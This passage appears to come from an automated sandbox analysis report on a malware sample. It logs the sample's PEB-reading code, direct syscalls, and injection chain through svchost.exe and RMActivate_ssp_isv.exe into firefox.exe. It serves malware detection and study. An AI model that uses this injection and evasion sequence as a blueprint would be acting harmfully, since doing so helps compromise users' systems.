                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h]2_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]2_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03756962 mov eax, dword ptr fs:[00000030h]2_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E mov eax, dword ptr fs:[00000030h]2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]2_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]2_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]2_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]2_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728918 mov eax, dword ptr fs:[00000030h]2_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h]2_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h]2_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]2_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h]2_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]2_2_037649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]2_2_037FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]2_2_037C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]2_2_03804940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h]2_2_037B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h]2_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD mov eax, dword ptr fs:[00000030h]2_2_037309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h]2_2_037BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h]2_2_037C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]2_2_03760854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734859 mov eax, dword ptr fs:[00000030h]2_2_03734859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]2_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov ecx, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752835 mov eax, dword ptr fs:[00000030h]2_2_03752835
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004880A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004880A9
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0045A155
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0045A124 SetUnhandledExceptionFilter,0_2_0045A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: NULL target: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: NULL target: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeThread register set: target process: 2276Jump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: AC5008Jump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004887B1 LogonUserW,0_2_004887B1
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00433B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00433B3A
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_004348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004348D7
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00494C53 mouse_event,0_2_00494C53
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BLv4mI7zzY.exe"Jump to behavior
                Source: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exeProcess created: C:\Windows\SysWOW64\RMActivate_ssp_isv.exe "C:\Windows\SysWOW64\RMActivate_ssp_isv.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\RMActivate_ssp_isv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_00487CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00487CAF
                Source: C:\Users\user\Desktop\BLv4mI7zzY.exeCode function: 0_2_0048874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0048874B
                Source: BLv4mI7zzY.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: XNNdkVYUhBbatb.exe, 00000005.00000000.2541993360.0000000001381000.00000002.00000001.00040000.00000000.sdmp, XNNdkVYUhBbatb.exe, 00000005.00000002.3365083191.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
